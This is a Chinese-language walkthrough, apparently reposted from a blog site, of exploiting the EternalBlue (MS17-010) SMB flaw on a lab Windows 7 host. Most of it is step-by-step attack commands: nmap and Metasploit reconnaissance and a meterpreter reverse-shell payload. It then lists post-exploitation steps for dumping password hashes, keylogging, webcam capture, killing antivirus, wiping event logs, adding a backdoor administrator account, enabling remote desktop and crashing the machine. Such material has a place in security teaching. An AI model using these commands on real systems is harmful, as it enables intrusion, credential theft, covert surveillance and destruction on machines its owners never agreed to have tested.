永恒之藍(lán) ms 17_010

1.漏洞介紹

永恒之藍(lán)（ms17-010）爆發(fā)于2017年4月14日晚，是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限，以此來控制被入侵的計(jì)算機(jī)。甚至于2017年5月12日， 不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒，使全世界大范圍內(nèi)遭受了該勒索病毒，甚至波及到學(xué)校、大型企業(yè)、政府等機(jī)構(gòu)，只能通過支付高額的贖金才能恢復(fù)出文件。不過在該病毒出來不久就被微軟通過打補(bǔ)丁修復(fù)。

1.1 影響版本

目前已知受影響的 Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

1.2 漏洞原理

通過向Windows服務(wù)器的SMBv1服務(wù)發(fā)送精心構(gòu)造的命令造成溢出，最終導(dǎo)致任意命令的執(zhí)行。在Windows操作系統(tǒng)中，SMB服務(wù)默認(rèn)是開啟的，監(jiān)聽端口默認(rèn)為445，因此該漏洞造成的影響極大。

2.信息收集

2.1 主機(jī)掃描

arp-scan -l

2.2 端口掃描

nmap -O -sS -T4 192.168.160.52

說明：

• -O：這個(gè)選項(xiàng)告訴Nmap進(jìn)行操作系統(tǒng)識(shí)別。它會(huì)嘗試通過分析目標(biāo)主機(jī)的網(wǎng)絡(luò)行為和響應(yīng)來猜測(cè)其運(yùn)行的操作系統(tǒng)類型。
• -sS：這個(gè)選項(xiàng)啟用了TCP SYN掃描（也稱為半開放掃描）。在進(jìn)行端口掃描時(shí)，Nmap發(fā)送一個(gè)TCP SYN包到目標(biāo)主機(jī)上的每個(gè)目標(biāo)端口，如果收到了一個(gè)SYN/ACK響應(yīng)，說明該端口是打開的。
• -T4：這個(gè)選項(xiàng)設(shè)置了掃描的速度/時(shí)間模板。T4是Nmap的默認(rèn)設(shè)置之一，表示較高的掃描速度和更少的等待時(shí)間。

3. 漏洞探測(cè)

msfconsole
# 搜尋模塊
search ms17-010

# 使用第三個(gè)模塊
use 3
# 查看該漏洞模塊的具體介紹信息
info

show missing # 查看需要配置哪些信息

這里需要配置遠(yuǎn)程主機(jī)的IP地址，也就是靶機(jī)的IP地址。

set rhosts 192.168.160.52

使用show options選項(xiàng)，查看我們要輸入的具體參數(shù)，其中標(biāo)注了yes的選項(xiàng)是必須的參數(shù)，若這個(gè)參數(shù)為空，則需要我們填寫。

show options 

開始攻擊：

run

顯示該主機(jī)很可能能夠會(huì)受到永恒之藍(lán)漏洞的攻擊。

4. 漏洞利用

search ms17-010

設(shè)置payload連接的方式，reverse_tcp為反向連接，即受害機(jī)主動(dòng)連接攻擊機(jī)，以獲取shell。

set payload windows/x64/meterpreter/reverse_tcp

設(shè)置攻擊目標(biāo)

set rhosts 192.168.160.52
run

拿下該主機(jī)的shell，執(zhí)行cmd命令。

在這里可以進(jìn)行文件上傳下載，獲取截屏，獲取密碼，使用攝像頭拍照，后門持久化等操作。

5.后滲透階段

運(yùn)行了run(exploit)命令之后，我們開啟了一個(gè)reverse TCP監(jiān)聽器來監(jiān)聽本地的 4444 端口，即攻擊者的本地主機(jī)地址（LHOST）和端口號(hào)（LPORT）。

在meterpreter > 中我們可以使用以下的命令來實(shí)現(xiàn)對(duì)目標(biāo)的操作：
sysinfo             #查看目標(biāo)主機(jī)系統(tǒng)信息
run scraper         #查看目標(biāo)主機(jī)詳細(xì)信息
hashdump        #導(dǎo)出密碼的哈希
load kiwi           #加載
ps                  #查看目標(biāo)主機(jī)進(jìn)程信息
pwd                 #查看目標(biāo)當(dāng)前目錄(windows)
getlwd              #查看目標(biāo)當(dāng)前目錄(Linux)
search -f *.jsp -d e:\                #搜索E盤中所有以.jsp為后綴的文件
download  e:\test.txt  /root          #將目標(biāo)機(jī)的e:\test.txt文件下載到/root目錄下
upload    /root/test.txt d:\test      #將/root/test.txt上傳到目標(biāo)機(jī)的 d:\test\ 目錄下getpid              #查看當(dāng)前Meterpreter Shell的進(jìn)程
PIDmigrate 1384     #將當(dāng)前Meterpreter Shell的進(jìn)程遷移到PID為1384的進(jìn)程上
idletime            #查看主機(jī)運(yùn)行時(shí)間
getuid              #查看獲取的當(dāng)前權(quán)限
getsystem           #提權(quán)
run  killav         #關(guān)閉殺毒軟件
screenshot          #截圖
webcam_list         #查看目標(biāo)主機(jī)的攝像頭
webcam_snap         #拍照
webcam_stream       #開視頻
execute  參數(shù)  -f 可執(zhí)行文件   #執(zhí)行可執(zhí)行程序
run getgui -u hack -p 123    #創(chuàng)建hack用戶，密碼為123
run getgui -e                #開啟遠(yuǎn)程桌面
keyscan_start                #開啟鍵盤記錄功能
keyscan_dump                 #顯示捕捉到的鍵盤記錄信息
keyscan_stop                 #停止鍵盤記錄功能
uictl  disable  keyboard     #禁止目標(biāo)使用鍵盤
uictl  enable   keyboard     #允許目標(biāo)使用鍵盤
uictl  disable  mouse        #禁止目標(biāo)使用鼠標(biāo)
uictl  enable   mouse        #允許目標(biāo)使用鼠標(biāo)
load                         #使用擴(kuò)展庫
run				             #使用擴(kuò)展庫
clearev                       #清除日志

示例：

查看主機(jī)系統(tǒng)信息

sysinfo

查看IP地址信息：

ipconfig

查看用戶身份

getuid

獲得shell控制臺(tái)

shell

如果亂碼受不了的話，輸入：chcp 65001 即可：

下面的模塊主要用于在取得目標(biāo)主機(jī)系統(tǒng)遠(yuǎn)程控制權(quán)后，進(jìn)行一系列的后滲透攻擊動(dòng)作。

run post/windows/manage/migrate                  #自動(dòng)進(jìn)程遷移     
run post/windows/gather/checkvm                  #查看目標(biāo)主機(jī)是否運(yùn)行在虛擬機(jī)上     
run post/windows/manage/killav                   #關(guān)閉殺毒軟件     
run post/windows/manage/enable_rdp               #開啟遠(yuǎn)程桌面服務(wù)     
run post/windows/manage/autoroute                #查看路由信息     
run post/windows/gather/enum_logged_on_users     #列舉當(dāng)前登錄的用戶     
run post/windows/gather/enum_applications        #列舉應(yīng)用程序     
run windows/gather/credentials/windows_autologin #抓取自動(dòng)登錄的用戶名和密碼     
run windows/gather/smart_hashdump                #dump出所有用戶的hash

示例：

獲取用戶密碼

run windows/gather/smart_hashdump 或者 hashdump

5.1創(chuàng)建新的管理員賬戶

進(jìn)入shell控制臺(tái)

在目標(biāo)主機(jī)上創(chuàng)建一個(gè)名為ghui的用戶，密碼為123456

將ghui加入到windows 7的本地管理員組中，以便獲得更大權(quán)限

net localgroup administrators ghui /add

查看本地用戶

net user

查看本地管理員

net localgroup administrators

可以看到ghui已經(jīng)被添加到windows管理員組中。

5.2開啟遠(yuǎn)程桌面

運(yùn)用getuid腳本開啟目標(biāo)主機(jī)遠(yuǎn)程桌面：

run getgui -e或者run post/windows/manage/enable_rdp

在kali終端輸入

rdesktop 192.168.160.52

選擇其他用戶：

登錄之前創(chuàng)建得ghui用戶，密碼123456：

5.3藍(lán)屏攻擊

最后一步，讓它藍(lán)屏：

taskkill /f /fi "pid ne 1"

解釋：

taskkill 用于終止運(yùn)行中的進(jìn)程，表示殺進(jìn)程。
/f 是一個(gè)參數(shù)，表示強(qiáng)制終止進(jìn)程。
/fi 是一個(gè)參數(shù)，用于指定進(jìn)程過濾器（filter）。
"pid ne 1" 是一個(gè)過濾器表達(dá)式，用于篩選進(jìn)程。在這個(gè)例子中，pid 代表進(jìn)程的 ID（PID），ne 表示不等于，1 是要排除的進(jìn)程 ID。換句話說，這個(gè)命令會(huì)終止除了進(jìn)程 ID 為 1（通常是系統(tǒng)進(jìn)程）之外的所有進(jìn)程。

執(zhí)行結(jié)果：

文章來源地址http://www.zghlxwxcb.cn/news/detail-717324.html

到了這里，關(guān)于永恒之藍(lán)漏洞 ms17_010 詳解的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！